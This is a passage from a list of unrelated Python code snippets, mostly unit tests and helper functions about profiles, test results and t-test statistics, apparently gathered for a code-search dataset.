soil_oi.ontology_metamodel_mapper.label_curie())\n soil_oi.multilingual = True\n self.assertTrue(soil_oi.multilingual)\n soil_oi.preferred_language = \"en\"\n label_cases = [\n (\"soilprofile:voids\", \"Voids\"),\n (\"soilprofile:soil-water-regime\", \"Soil water regime\"),\n ]\n elabels = list(soil_oi.labels(soil_oi.entities()))\n for curie, label in label_cases:\n self.assertIn((curie, label), elabels)\n self.assertEqual(label, soil_oi.label(curie))\n config = SearchConfiguration(is_partial=False, properties=[SearchProperty.LABEL])\n curies = list(soil_oi.basic_search(label, config=config))\n self.assertEqual([curie], curies)\n # TODO:\n # self.assertEqual([curie], soil_oi.curies_by_label(label))\n tdef = soil_oi.definition(\"soilprofile:voids-cracks\")\n self.assertEqual(\"Planar voids\", tdef)", "def test_profile_filtering(instr_task_workbench, instr_view):\n add_profile(instr_task_workbench, 'fp5', 'Dummy.dumb.002')\n p = instr_task_workbench.get_plugin('ecpy.instruments')\n filtered = instr_view.filter_profiles(p._profiles)\n assert 'fp5' not in filtered\n\n add_profile(instr_task_workbench, 'fp6', 'Dummy.dumb.003')\n p = instr_task_workbench.get_plugin('ecpy.instruments')\n filtered = instr_view.filter_profiles(p._profiles)\n assert 'fp6' in filtered", "def test_creation_profile_4():\n assert tuple_NT[0][3] == LIST_dict[0]['blood_group'], \"blood_group of profile is not getting stored properly\"", "def test_get_hyperflex_node_profile_by_moid(self):\n pass", "def lttest_1samp(a,popmean,printit=0,name='Sample',writemode='a'):\r\n x = mean(a)\r\n v = var(a)\r\n n = len(a)\r\n df = n-1\r\n svar = ((n-1)*v)/float(df)\r\n t = (x-popmean)/math.sqrt(svar*(1.0/n))\r\n prob = betai(0.5*df,0.5,float(df)/(df+t*t))\r\n\r\n if printit <> 0:\r\n statname = 'Single-sample T-test.'\r\n outputpairedstats(printit,writemode,\r\n 'Population','--',popmean,0,0,0,\r\n name,n,x,v,min(a),max(a),\r\n statname,t,prob)\r\n return t,prob", "def test(self, test_iter, step, corpus_type, id):\n\n self.model.eval()\n stats = Statistics()\n if not os.path.exists(self.args.result_path):\n os.makedirs(self.args.result_path)\n if not os.path.exists(self.args.story_path):\n os.makedirs(self.args.story_path)\n can_path = self.args.result_path + corpus_type + '.' + id + '_step%d.candidate' % step\n gold_path = self.args.result_path + corpus_type + '.' + id + '_step%d.gold' % step\n story_path = self.args.story_path + corpus_type + '.' + id + '.story'\n with open(story_path, 'w') as save_story:\n with open(can_path, 'w') as save_pred:\n with open(gold_path, 'w') as save_gold:\n with torch.no_grad():\n for batch in test_iter:\n src = batch.src\n labels = batch.labels\n segs = batch.segs\n clss = batch.clss\n mask = batch.mask\n mask_cls = batch.mask_cls\n weight = batch.weight\n index = batch.index\n\n pred = []\n\n sents_vec, sent_scores, mask, cluster_weight = self.model(src, segs, clss, mask, mask_cls)\n loss = self.loss(sent_scores, labels.float())\n weight_loss = self.weight_loss(cluster_weight, weight)\n loss = (loss * mask.float()).sum()\n total_loss = loss + weight_loss * 10\n batch_stats = Statistics(float(total_loss.cpu().data.numpy()), len(labels))\n stats.update(batch_stats)\n\n sent_scores = sent_scores + mask.float()\n sent_scores = sent_scores.cpu().data.numpy()\n cluster_weight = cluster_weight.cpu().data.numpy()\n selected_ids = np.argsort(-sent_scores, 1)\n cluster_weight = np.argsort(cluster_weight)\n # print(selected_ids)\n # selected_ids = np.sort(selected_ids,1)\n cluster_num = len(cluster_weight)\n for i, idx in enumerate(selected_ids):\n rank = np.where(cluster_weight == i)[0][0]\n\n if rank <= max(cluster_num // 6, 6):\n for j in range(5):\n sen_ind = selected_ids[i][j]\n _pred = batch.src_str[i][sen_ind].strip()\n pred.append((index[i][sen_ind], _pred))\n elif rank <= max(cluster_num // 3, 10):\n for j in range(3):\n sen_ind = selected_ids[i][j]\n _pred = batch.src_str[i][sen_ind].strip()\n pred.append((index[i][sen_ind], _pred))\n elif rank <= max(cluster_num * 2 // 3, 15):\n for j in range(2):\n sen_ind = selected_ids[i][j]\n _pred = batch.src_str[i][sen_ind].strip()\n pred.append((index[i][sen_ind], _pred))\n else:\n sen_ind = selected_ids[i][0]\n _pred = batch.src_str[i][sen_ind].strip()\n pred.append((index[i][sen_ind], _pred))\n\n gold_summary = (batch.tgt_str[0].strip())\n pred.sort(key=lambda x: x[0])\n for i in range(len(pred)):\n save_story.write(pred[i][1].strip() + '\\n')\n if i == 0:\n save_pred.write(pred[i][1].strip())\n else:\n save_pred.write('<q> ' + pred[i][1].strip())\n save_gold.write(gold_summary)\n for sent in gold_summary.split('<q>'):\n save_story.write('@highlight {}\\n'.format(sent))\n if self.args.test_txt:\n return stats\n else:\n rouges = calculate_rouge(can_path, gold_path)\n logger.info('Rouges at step %d \\n%s' % (step, rouge_results_to_str(rouges)))\n self._report_step(0, step, valid_stats=stats)\n return stats, rouges", "def test_home_by_Next_tram(self):\r\n result = self.app.get('/prochain/1/ANTIGONE/MOSSON')\r\n self.assertTrue(b'LIGNE' in result.data)\r\n self.assertTrue(b'ARRET' in result.data)\r\n self.assertTrue(b'DESTINATION' in result.data)", "def test_profile(profile_manager):\n name = 'test_profile'\n yield profile_manager.create(name)\n if profile_manager.has_profile(name):\n profile_manager.delete(name)", "def test_get_hyperflex_cluster_profile_by_moid(self):\n pass", "def test_list_profiles(self):\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.data['results']), 1)", "def create_profiles(tree, attribute, out_feature='altitude',\n filtering_rule='direct', profiles_name='unknow'):\n data = []\n description = []\n\n # Create Trees\n try:\n if isinstance(tree, trees.Tree):\n # Dual tree\n ndual = False\n thinning_tree = None\n thickening_tree = tree\n else:\n # Non dual trees\n ndual = True\n thinning_tree = tree[0]\n thickening_tree = tree[1]\n except:\n raise TypeError('Parameter tree_type must be a tuple or a single' \\\n ' instance of Tree, not {}'.format(tree))\n\n out_features = (out_feature, ) if isinstance(out_feature, str) else out_feature\n\n iter_count = (sum(len(x) for x in attribute.values()) * (1 + ndual) + \\\n len(attribute)) * len(out_features)\n ttq = tqdm(desc='Total', total=iter_count)\n for att, thresholds in attribute.items():\n tq = tqdm(total=(len(thresholds) * (1 + ndual) + 1) * len(out_features), desc=att)\n\n for out_feature in out_features:\n profiles = []; profiles_description = []\n of = att if out_feature == 'same' else out_feature\n\n if ndual:\n # thinning\n prof, desc = _compute_profiles(thinning_tree, att,\n thresholds[::-1], (ttq, tq), of, filtering_rule)\n profiles += prof\n profiles_description += desc\n\n # Origin\n tq.update(); ttq.update()\n profiles += [thickening_tree.reconstruct(feature=of)]\n profiles_description += [{'operation': 'copy feature {}'.format(of)}]\n\n # thickening\n prof, desc = _compute_profiles(thickening_tree, att, thresholds,\n (ttq, tq), of, filtering_rule)\n profiles += prof\n profiles_description += desc\n\n\n data += [np.stack(profiles)]\n description += [{'tree': thickening_tree.get_params(),\n 'name': profiles_name,\n 'attribute': att,\n 'profiles': profiles_description,\n 'filtering rule': filtering_rule,\n 'out feature': of}]\n tq.close()\n ttq.close()\n\n return Profiles(data, description)", "def getTestResults():", "def profile(x):\n return x", "def test_teacher_check_homework_positive():\n assert opp_teacher.check_homework(result_1)", "def ttest_review(sample_1, sample_2, alpha=.05):\n\n result = stats.ttest_ind(sample_1, sample_2)\n crit_val, p_val = result\n \n ## Creating interpretation based on p-value results.\n\n if p_val < .05:\n print(f'The feature is statistically significant with a p-value of {p_val}.')\n\n else:\n print(f'The feature is not statistically significant with a p-value of {p_val}.')\n \n return p_val", "def match(self, profile_index, nb_profile=3, show_other_skill=True):\n sample = self.df.loc[profile_index].values\n if sum(sample) == 0:\n print('This profile doesn\\'t have skill.')\n return \n score = self.df.values.dot(sample)\n score = list(score)\n self.max_index = heapq.nlargest(nb_profile+1, range(len(score)), score.__getitem__)\n print(\"input profile:\")\n self.show_skill(profile_index, show_other_skill=show_other_skill)\n print(\"matched profiles:\")\n for i in range(len(self.max_index)):\n if i == nb_profile:\n break\n if self.max_index[i] != profile_index:\n self.show_skill(self.max_index[i], show_other_skill=show_other_skill)\n return", "def _profile_function(function, profiles, game):\n return [function(game, prof) for prof in profiles] # pragma: no cover", "def test_create_profile(self):\n self.cim.create_profile(\n card_number=u\"42222222222\",\n expiration_date=u\"2010-04\",\n customer_id=u\"dialtone\"\n )\n\n def assert_other(message):\n assert 'creditCardNumber' not in message\n assert 'bankAccount' in message\n self.assert_other = assert_other\n try:\n self.cim.create_profile(\n customer_id=u\"dialtone\",\n profile_type=u\"bank\",\n name_on_account=u\"John Doe\",\n routing_number=u\"12345678\",\n account_number=u\"1234567890\"\n )\n finally:\n del self.assert_other\n\n self.cim.create_profile(\n card_number=u\"42222222222\",\n expiration_date=u\"2010-04\",\n customer_id=u\"dialtone\",\n ship_phone=u'415-415-4154',\n ship_first_name=u'valentino'\n )\n\n payment_profiles = [\n dict(card_number=u\"43333333333\",\n expiration_date=u\"2010-04\"),\n dict(profile_type=u\"bank\",\n name_on_account=u\"John Doeð\",\n routing_number=u\"12345678\",\n account_number=u\"1234567890\")\n ]\n\n def assert_other(message):\n assert 'John Doe' in message\n assert '43333333333' in message\n assert 'valentino' in message\n self.assert_other = assert_other\n try:\n self.cim.create_profile(\n customer_id=u\"dialtone\",\n payment_profiles=payment_profiles,\n ship_phone=u\"415-415-4154\",\n ship_first_name=u\"valentino\"\n )\n finally:\n del self.assert_other", "def test_if_paper_beats_rock():\n\tresult = game.evaluate_game('paper', 'rock')\n\tassert result == 'User'", "def getprofile(): # real signature unknown; restored from __doc__\n pass", "def test_add_spawning_profile_to_intersection():\n tester = TestClass()\n intersections = tester.add_spawning_profile_to_intersection()\n\n attached = False\n\n for i in intersections:\n for spawn in i.get_spawning_profile_list():\n if spawn.get_spawning_profile_name() == 'Default':\n attached = True\n break;\n\n assert attached", "def test_compare_perforamce():\n # Create fake profiles library by named tuples\n faker_db = session10.create_fake_library_by_namedtuple(100)\n\n # Create fake profiles library through dictionary\n faker_db_dict = session10.create_fake_library_by_dict(100)\n\n ntup, dict = session10.compare_time(faker_db, faker_db_dict)\n\n assert ntup<dict, \"Implementation is not correct\"", "def ttest():\n # open test results and perform regression analysis\n alphas = []\n betas = []\n iterations = {}\n with open(f\"Results/conclusion2.csv\") as f:\n csv_reader = csv.reader(f, delimiter=',')\n\n for run in csv_reader:\n max, max_i = get_max_run(run)\n if int(run[0]) not in iterations:\n iterations[int(run[0])] = {100 - int(run[1])-1: int(max)}\n else:\n iterations[int(run[0])][100 - int(run[1])-1] = int(max)\n\n for iteration in iterations:\n mono_levels = list(iterations[iteration].keys())\n pop_sizes = [iterations[iteration][i] for i in mono_levels]\n\n regress_result = regress(pop_sizes, mono_levels)\n alphas += [regress_result[1]]\n betas += [regress_result[0]]\n\n # plot scatter and regression line\n avg_alpha = sum(alphas)/len(alphas)\n avg_beta = sum(betas)/len(betas)\n stddev_beta = np.std(betas)\n vis.scatter_mono(iterations, avg_alpha, avg_beta)\n\n # perform t-test\n ttest_result = stats.ttest_ind(betas, [0 for i in betas], equal_var=True)\n t_stat = ttest_result[0]\n p_value = ttest_result[1]\n print(f'Results from t-test:')\n print(f'Avg beta: {avg_beta}, stddev beta: {stddev_beta}.')\n print(f't-stat: {t_stat}, p-value: {p_value}.')", "def test_with_file(filename) :\n\tif not os.path.exists(filename) :\n\t\tprint('File not exists: ' + filename)\n\t\tsys.exit(-1)\n\n\twith open(filename, 'r') as file :\n\t\tcode = file.read()\n\n\tprobabilities = shaman.Shaman.default().detect( code )\n\t\n\tfor index, (lang, prob) in enumerate(probabilities) :\n\t\tif index > 3: break\n\t\t\n\t\tprint(\"%s: %.2lf%%\" % (lang, prob))", "def test_creation_profile_1():\n assert tuple_NT[0][0] == LIST_dict[0]['name'], \"Name is not getting stored properly\"", "def bak_verify_server_profile_general_info(*profile_obj):\n selenium2lib = ui_lib.get_s2l()\n\n if not selenium2lib._is_element_present(FusionServerProfilesPage.ID_PAGE_LABEL):\n navigate()\n\n for profile in profile_obj:\n server = profile.server\n hardwaretype = profile.hardwareType\n enclosuregroup = profile.enclgroup\n\n ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_ELEMENT_PROFILE_NAME_BASE % profile.name)\n ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_ELEMENT_PROFILE_NAME_BASE % profile.name)\n BuiltIn().sleep(5) # wait for fields to load\n\n logger.info(\"Verifying server hardware for profile %s\" % profile.name)\n if ui_lib.wait_for_element_text(FusionServerProfilesPage.ID_PROFILE_SERVER, server, PerfConstants.DEFAULT_SYNC_TIME) is False:\n txt = ui_lib.get_text(FusionServerProfilesPage.ID_PROFILE_SERVER)\n logger.info(\"Server hardware of server : %s is not as expected [%s]\" % (txt, server))\n selenium2lib.capture_page_screenshot()\n return False\n\n logger.info(\"Verifying server hardware type for profile %s\" % profile.name)\n if ui_lib.wait_for_element_visible(FusionServerProfilesPage.ID_PROFILE_HARDWARE, PerfConstants.DEFAULT_SYNC_TIME, fail_if_false=False) is True:\n txt = ui_lib.get_text(FusionServerProfilesPage.ID_PROFILE_HARDWARE)\n if txt.find(hardwaretype) == -1:\n logger.info(\"Server hardware of server : %s is not as expected [%s]\" % (txt, hardwaretype))\n selenium2lib.capture_page_screenshot()\n return False\n else:\n logger.warn(\"Failed to wait server hardware type field display\")\n return False\n\n logger.info(\"Verifying enclosure group for profile %s\" % profile.name)\n if ui_lib.wait_for_element_text(FusionServerProfilesPage.ID_PROFILE_ENCLOSUREGROUP, enclosuregroup, PerfConstants.DEFAULT_SYNC_TIME) is False:\n txt = ui_lib.get_text(FusionServerProfilesPage.ID_PROFILE_ENCLOSUREGROUP)\n logger.info(\"Enclosure group of server : %s is not as expected [%s]\" % (txt, enclosuregroup))\n selenium2lib.capture_page_screenshot()\n return False\n\n return True", "def test_zet_resultaat(self, state, zrc_client, ztc_client):\n zrc_client.auth.set_claims(\n scopes=[\n 'zds.scopes.zaken.lezen',\n 'zds.scopes.zaken.bijwerken'\n ],\n zaaktypes=[state.zaaktype['url']]\n )\n resultaattype = ztc_client.retrieve('resultaattype', uuid=RESULTAATTYPE_UUID)\n\n assert 'url' in resultaattype\n\n resultaat = zrc_client.create('resultaat', {\n 'zaak': state.zaak['url'],\n 'resultaatType': resultaattype['url'],\n 'toelichting': 'Een toelichting op wat het resultaat',\n })\n\n assert 'url' in resultaat", "def test_zet_resultaat(self, state, zrc_client, ztc_client):\n zrc_client.auth.set_claims(\n scopes=[\n 'zds.scopes.zaken.lezen',\n 'zds.scopes.zaken.bijwerken'\n ],\n zaaktypes=[state.zaaktype['url']]\n )\n resultaattype = ztc_client.retrieve('resultaattype', uuid=RESULTAATTYPE_UUID)\n\n assert 'url' in resultaattype\n\n resultaat = zrc_client.create('resultaat', {\n 'zaak': state.zaak['url'],\n 'resultaatType': resultaattype['url'],\n 'toelichting': 'Een toelichting op wat het resultaat',\n })\n\n assert 'url' in resultaat", "def profile_function(\n game, function, profiles, num_resamples, *, percentiles=None, processes=None\n):\n profiles = profiles.reshape((-1, game.num_strats))\n return game_function(\n game,\n functools.partial(_profile_function, function, profiles),\n num_resamples,\n profiles.shape[0],\n percentiles=percentiles,\n processes=processes,\n )", "def test_profile_commands(self):\n with DockerHost('host', start_calico=False) as host:\n\n host.calicoctl(\"profile add TEST_PROFILE\")\n\n json_dict = {\"id\": \"TEST_PROFILE\",\n \"inbound_rules\": [\n {\"action\": \"allow\",\n \"src_tag\": \"TEST_PROFILE\"},\n {\"action\": \"deny\"}\n ],\n \"outbound_rules\": [{\"action\": \"deny\",\n \"dst_net\": \"192.168.0.0/16\"},\n {\n \"action\": \"allow\"\n }]}\n\n update = json.dumps(json_dict)\n cmd = \"/code/dist/calicoctl profile TEST_PROFILE rule update\"\n host.execute(\"echo '%s' | %s\" % (update, cmd))\n\n self.assertIn('1 deny',\n host.calicoctl(\"profile TEST_PROFILE rule show\"))\n\n result = host.calicoctl(\"profile TEST_PROFILE rule json\")\n rules = json.loads(result)\n self.assertDictEqual(rules, json_dict)\n\n # Test that adding and removing a tag works.\n self.assertNotIn(\"TEST_TAG\", self.show_tag(host))\n host.calicoctl(\"profile TEST_PROFILE tag add TEST_TAG\")\n self.assertIn(\"TEST_TAG\", self.show_tag(host))\n host.calicoctl(\"profile TEST_PROFILE tag remove TEST_TAG\")\n self.assertNotIn(\"TEST_TAG\", self.show_tag(host))", "def mock_gt_single(get_mock_dicom_verify_results: dict):\n gt = get_mock_dicom_verify_results[\"ground_truth\"]\n return gt", "def test_predictor():", "def negative_test_for_check_general_session(profile_obj):\n status = True\n\n logger._log_to_console_and_log_file(\"### Testing the 'General' session ###\")\n\n # LIST_OF_TESTS specify a list of elements to be validated in the \"General\" page\n # For each element of the list, we add the following information:\n # [0] = The locator of the field that we'll input the data (e.g. FusionPage.DescriptionEditBox)\n # [1] = The input data (e.g. MyProfile, !@#%&&*, blablabla, etc...)\n # [2] = The locator of the error message (e.g. FusionPage.ErrorMessage)\n # [3] = The Message name that will be displayed at the console and logs\n for profile in profile_obj:\n LIST_OF_TESTS = [[None, \"\", FusionServerProfilesPage.ID_WARNING_FIELD_REQUIRED, \"ID_WARNING_FIELD_REQUIRED\"],\n [FusionServerProfilesPage.ID_SERVER_HARDWARE_TEXT_BOX, \"none\", FusionServerProfilesPage.ID_WARNING_INVALID_SERVERHARDWARE, \"ID_WARNING_INVALID_SERVERHARDWARE\"],\n [FusionServerProfilesPage.ID_INPUT_SERVER_HARDWARE_TYPE, \"none\", FusionServerProfilesPage.ID_WARNING_INVALID_SERVER_HARDWARE_TYPE, \"ID_WARNING_INVALID_SERVER_HARDWARE_TYPE\"],\n [FusionServerProfilesPage.ID_ENCLOSURE_GROUP_TEXT_BOX, \"none\", FusionServerProfilesPage.ID_WARNING_INVALID_ENCLOSURE_GROUP, \"ID_WARNING_INVALID_ENCLOSURE_GROUP\"],\n [FusionServerProfilesPage.ID_SERVER_HARDWARE_TEXT_BOX, profile.invalidChars, FusionServerProfilesPage.ID_WARNING_INVALID_SERVERHARDWARE, \"ID_WARNING_INVALID_SERVERHARDWARE\"],\n [FusionServerProfilesPage.ID_INPUT_SERVER_HARDWARE_TYPE, profile.invalidChars, FusionServerProfilesPage.ID_WARNING_INVALID_SERVER_HARDWARE_TYPE, \"ID_WARNING_INVALID_SERVER_HARDWARE_TYPE\"],\n [FusionServerProfilesPage.ID_ENCLOSURE_GROUP_TEXT_BOX, profile.invalidChars, FusionServerProfilesPage.ID_WARNING_INVALID_ENCLOSURE_GROUP, \"ID_WARNING_INVALID_ENCLOSURE_GROUP\"]]\n logger._log_to_console_and_log_file(\"Testing using MISSING information and with special chars\")\n for test in LIST_OF_TESTS:\n # Fill \"Server hardware\" if needed.\n if test[0] == FusionServerProfilesPage.ID_INPUT_SERVER_HARDWARE_TYPE:\n ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_COMBO_SERVER_HARDWARE_DROPDOWN)\n ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_SERVER_HARDWARE_UNASSIGNED)\n ui_lib.wait_for_element_and_input_text(FusionServerProfilesPage.ID_INPUT_SERVER_PROFILE_NAME, \"Name\")\n if test[0] is not None:\n ui_lib.wait_for_element_and_input_text(test[0], test[1])\n ui_lib.wait_for_element_and_click(test[0])\n ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_BTN_CREATE_SERVER_PROFILE)\n if not correctly_executed(ui_lib.wait_for_element_visible, test[2], test[3]):\n status = False\n if not status:\n ui_lib.fail_test(\"At least one error message was not displayed\")", "def test_create_payment_profile(self):\n self.cim.create_payment_profile(\n customer_profile_id=u'300',\n customer_type=u'individual',\n card_number=u'42222222222',\n expiration_date=u'2009-10'\n )", "def test_init(self):\n self.assertTrue(self.profile.bio == \"very awesome\")", "def test_components_profile(self):\r\n\t\tprofile = Profile.objects.get(bio=\"I'm a female profile with inserted components\")\r\n\t\tself.assertEqual(self.u1.profile, profile)", "def test_profile_state(self, country, state, expected):\n with mute_signals(post_save):\n profile = ExamProfileFactory(\n profile__country=country,\n profile__state_or_territory=state\n )\n assert CDDWriter.profile_state(profile) == expected", "def extract_results_test(self):\n assert len(self.results.keys()) != 0\n TESTS = [\n {\n \"input\": {\"molecules\": [\"DDSPDLPK\"], \"score_threshold\": 0.95},\n \"output\": {\n \"formula\": \"C(37)H(59)N(9)O(16)\",\n \"file_name\": \"BSA1.mzML\",\n \"scaling_factor\": 100,\n \"spec_id\": 1337,\n },\n }\n ]\n for test_dict in TESTS:\n for key, n, entry in self.results.extract_results(**test_dict[\"input\"]):\n print(key, entry)\n assert key.formula == test_dict[\"output\"][\"formula\"]\n assert key.file_name == test_dict[\"output\"][\"file_name\"]\n assert entry.scaling_factor == test_dict[\"output\"][\"scaling_factor\"]\n assert entry.spec_id == test_dict[\"output\"][\"spec_id\"]\n # print(self.results)\n # print(self.results.lookup)\n assert n == 0", "async def test_retrieve_one(self):\n expected = {\n '_id': 'id',\n 'name': 'name',\n 'version': 4,\n 'status': 'active'\n }\n rsps = respx.get(f'{PROVISIONING_API_URL}/users/current/provisioning-profiles/id') \\\n .mock(return_value=Response(200, json=expected))\n profile = await provisioning_client.get_provisioning_profile('id')\n assert rsps.calls[0].request.url == \\\n f'{PROVISIONING_API_URL}/users/current/provisioning-profiles/id'\n assert rsps.calls[0].request.headers['auth-token'] == 'header.payload.sign'\n assert profile == expected", "def test_T01():", "def test_output_set_output_flag_for_property_where_array(profile_from_dataset):\n output = CheckOutput(profile=profile_from_dataset)\n\n where = np.full_like(profile_from_dataset.get_property_data(\"PRES\"), False, dtype=bool)\n where[0] = True\n where[-1] = True\n\n output.ensure_output_for_property(\"PRES\")\n output.set_output_flag_for_property(\"PRES\", ArgoQcFlag.PROBABLY_GOOD, where=where)\n flags = output.get_output_flags_for_property(\"PRES\")\n\n assert flags is not None\n assert isinstance(flags, ma.MaskedArray)\n assert np.all(flags[0] == ArgoQcFlag.PROBABLY_GOOD.value)\n assert np.all(flags[1:-1] == ArgoQcFlag.GOOD.value)\n assert np.all(flags[-1] == ArgoQcFlag.PROBABLY_GOOD.value)", "def createMakingTest(tx, query, personId, testId, date, hour, result):\n tx.run(query, personId=personId, testId=testId, date=date, hour=hour, result=result)", "def should_profile():\n if util.dev_server:\n return _config.should_profile_development()\n else:\n return _config.should_profile_production()", "def test_get_result_histogram(self):\n pass", "def test(self, test_no):\n returncode, out = self.run(test_no)\n out = str.strip(out) if out else None\n\n if self._output[test_no][0] == returncode:\n print(\"RETURN CODE CORRECT\")\n else:\n print(\n \"ERROR: EXPECTED return {}, ACTUAL return {}.\".format(\n self._output[test_no][0], returncode), file=sys.stderr)\n\n if not out and len(self._output[test_no]) > 1:\n print(\"ERROR: No output from student app.\", file=sys.stderr)\n return\n sys.exit(1)\n\n if len(self._output[test_no]) == 1 or self._output[test_no] == 2:\n # bad input size or negative decimal value\n return\n sys.exit(0)\n\n if self._output[test_no][1] == out:\n print(\"OUTPUT CORRECT\")\n else:\n print(\"ERROR: EXPECTED {}, ACTUAL {}\".format(\n self._output[test_no][1], out, file=sys.stderr))", "def Run_Profile(init,traits,Env,sig = 0.0001,Ntot0 = 10,tmax = 100,T=TS,dt = 0.01,mu=0.005):\n\n\t## Environmental conditions\n\tHinf = Env[0]\n\tCinf = Env[1]\n\tNinf = Env[2]\n\tGinf = Env[3]\n\tQH = Env[4]\n\tQC = Env[5]\n\tQN = Env[6]\n\tQG = Env[7]\n \n\t## Traits \n\tthresh = traits[7]\n\tslope = traits[8]\n\tgmax = traits[9]\n\tVc = traits[1]\n\tQc = traits[2]\n\n\t## Calculation of constants over timescale of interest (here, the temperature is constant)\n\tDeltaG0catT = DeltaG0(T,deltaG0Cat,deltaH0Cat)\n\tDeltaG0anaT = DeltaG0(T,deltaG0Ana,deltaH0Ana)\n \n\t## Initialization\n\tHT = []\n\tCT = []\n\tNT = []\n\tGT = []\n\tXoT = []\n\tNCT = []\n\tXT = []\n\tD = []\n\ttime = []\n\tNPPT = []\n\tt=1\n\n\tHT.append(init[0])\n\tCT.append(init[1])\n\tNT.append(init[2])\n\tGT.append(init[3])\n\tXoT.append(init[4])\n\tNCT.append(init[5])\n\tXT.append(init[6])\n\tD.append(0)\n\ttime.append(0)\n\tt=1\n \n\twhile time[t-1] < tmax: \n\t\tH = HT[t-1]\n\t\tC = CT[t-1]\n\t\tN = NT[t-1]\n\t\tG = GT[t-1]\n\t\tXo = XoT[t-1]\n\t\tNC = NCT[t-1]\n\t\tX0 = XT[t-1]\n\n\t\tnNCT,nXT,qana,qcat,decay,mort,dt = Step_Profile(NC,X0,traits,[H,C,N,G],gamma,T,dt)\n\t\tNCT.append(nNCT)\n\t\tXT.append(nXT)\n\t\tD.append(decay+mort)\n\t\tnS = Step_Substrates([H,C,N,G],Hinf,Cinf,Ninf,Ginf,QH,QC,QN,QG,NCT[t-1],qana,qcat,dt,Vc)\n\t\tHT.append(nS[0])\n\t\tCT.append(nS[1])\n\t\tNT.append(nS[2])\n\t\tGT.append(nS[3])\n\t\tNPPT.append(qana*NC)\n\n\t\tnXo = Step_DeadBiomass(Xo,Hinf,Cinf,Ninf,Ginf,QH,QC,QN,QG,NCT[t-1],decay,mort,Qc,XT[t-1],dt,Vc)\n\t\tXoT.append(nXo)\n\t\ttime.append(time[t-1] + dt)\n\t\tt=t+1 \n#\t\tprint(time[t-1])\n\treturn(NCT,XT,HT,CT,NT,GT,XoT,D,time,NPPT)", "def TestSample(self, index=None, params=None):\t\t\n\t\tif index == None:\n\t\t\tindex = random.randint(1,self.nTest)\n\t\ts = ReadAIFF(self.dataDir+'test'+('%i'%index)+'.aiff')\n\t\tP, freqs, bins = mlab.specgram(s, **params)\n\t\treturn P, freqs, bins", "def print_results(results, random_counterpart=None, random_concepts=None, num_random_exp=100,\n min_p_val=0.05):\n\n # helper function, returns if this is a random concept\n def is_random_concept(concept):\n if random_counterpart:\n return random_counterpart == concept\n\n elif random_concepts:\n return concept in random_concepts\n\n else:\n return 'random500_' in concept\n\n # print class, it will be the same for all\n print(\"Class =\", results[0]['target_class'])\n\n # prepare data\n # dict with keys of concepts containing dict with bottlenecks\n result_summary = {}\n\n # random\n random_i_ups = {}\n\n for result in results:\n if result['cav_concept'] not in result_summary:\n result_summary[result['cav_concept']] = {}\n\n if result['bottleneck'] not in result_summary[result['cav_concept']]:\n result_summary[result['cav_concept']][result['bottleneck']] = []\n\n result_summary[result['cav_concept']][result['bottleneck']].append(result)\n\n # store random\n if is_random_concept(result['cav_concept']):\n if result['bottleneck'] not in random_i_ups:\n random_i_ups[result['bottleneck']] = []\n\n random_i_ups[result['bottleneck']].append(result['i_up'])\n\n # print concepts and classes with indentation\n for concept in result_summary:\n\n # if not random\n if not is_random_concept(concept):\n print(\" \", \"Concept =\", concept)\n\n for bottleneck in result_summary[concept]:\n i_ups = [item['i_up'] for item in result_summary[concept][bottleneck]]\n\n # Calculate statistical significance\n _, p_val = ttest_ind(random_i_ups[bottleneck], i_ups)\n\n print(3 * \" \", \"Bottleneck =\", (\"%s. TCAV Score = %.2f (+- %.2f), \"\n \"random was %.2f (+- %.2f). p-val = %.3f (%s)\") % (\n bottleneck, np.mean(i_ups), np.std(i_ups),\n np.mean(random_i_ups[bottleneck]),\n np.std(random_i_ups[bottleneck]), p_val,\n \"not significant\" if p_val > min_p_val else \"significant\"))", "def test_get_result_histogram_stat(self):\n pass", "def test_get_risk_profile_all_using_get(self):\n pass", "def test_components_profile_gender(self):\r\n\t\tself.assertEqual(self.u1.profile.gender, 'female')", "def test_is_instance(self):\n self.assertTrue(isinstance(self.profile, Profile))", "def test_remove_spawning_profile_from_intersection():\n tester = TestClass()\n intersections = tester.add_spawning_profile_to_intersection()\n\n for i in intersections:\n if len(i.get_spawning_profile_list()) != 0:\n assert True\n\n for spawn in i.get_spawning_profile_list():\n if spawn.get_spawning_profile_name() == 'Default':\n assert True\n break\n\n tester.delete_spawning_profile_from_intersection()\n\n for i in intersections:\n if len(i.get_spawning_profile_list()) == 0:\n assert True", "def filterprofile(profile, settings):\n \n if settings.exclude is True and len(profile.description) == 0:\n print(\"EMPTY BIO\")\n return False\n\n if profile.description is None:\n return False\n\n if len(settings.include_keywords) > 1 and not any(kw in profile.description for kw in settings.include_keywords.splitlines()):\n print(\"NO KEYWORDS\")\n return False\n\n if profile.followers_count is None:\n return False\n \n if profile.followers_count < settings.followers:\n print(\"NUM FOLLOWERS\")\n return False\n\n if any(loc in profile.location for loc in settings.fromcountries.splitlines()):\n print(\"LOCATION\")\n return False\n\n if profile.statuses_count < settings.tweets:\n print(\"NUM TWEETS\")\n return False\n\n created = datetime.datetime.strptime(profile.created_at, \"%a %b %d %H:%M:%S %z %Y\")\n months = relativedelta(datetime.datetime.now(datetime.timezone.utc), created).years * 12\n if months == 0:\n if (profile.statuses_count / 12) > settings.tweetsperyear:\n print(\"TWEETS PER YEAR\")\n return False\n else:\n if (profile.statuses_count / months / 12) > settings.tweetsperyear:\n print(\"TWEETS PER YEAR\")\n return False\n\n if profile.status is not None:\n lasttweetdate = datetime.datetime.strptime(profile.status.created_at, \"%a %b %d %H:%M:%S %z %Y\").replace(tzinfo=None)\n \n lasttweetmonths = relativedelta(datetime.datetime.now(), lasttweetdate).years * 12\n if lasttweetmonths > settings.notweetsfor:\n print(\"LAST TWEET\")\n return False\n else:\n return False\n # else\n return True", "def __call__(self, results):\n if np.random.rand() > self.prob:\n return results\n self._imequalize(results)\n return results", "def test_create_hyperflex_node_profile(self):\n pass", "def test(self):\n img_gen, self.loss_reg, self.parsav = self.net_G(self.input_P1, self.input_P2, self.input_BP1, self.input_BP2, self.input_SPL1, self.input_SPL2)\n ## test flow ##\n\n self.save_results(img_gen, data_name='vis')\n if 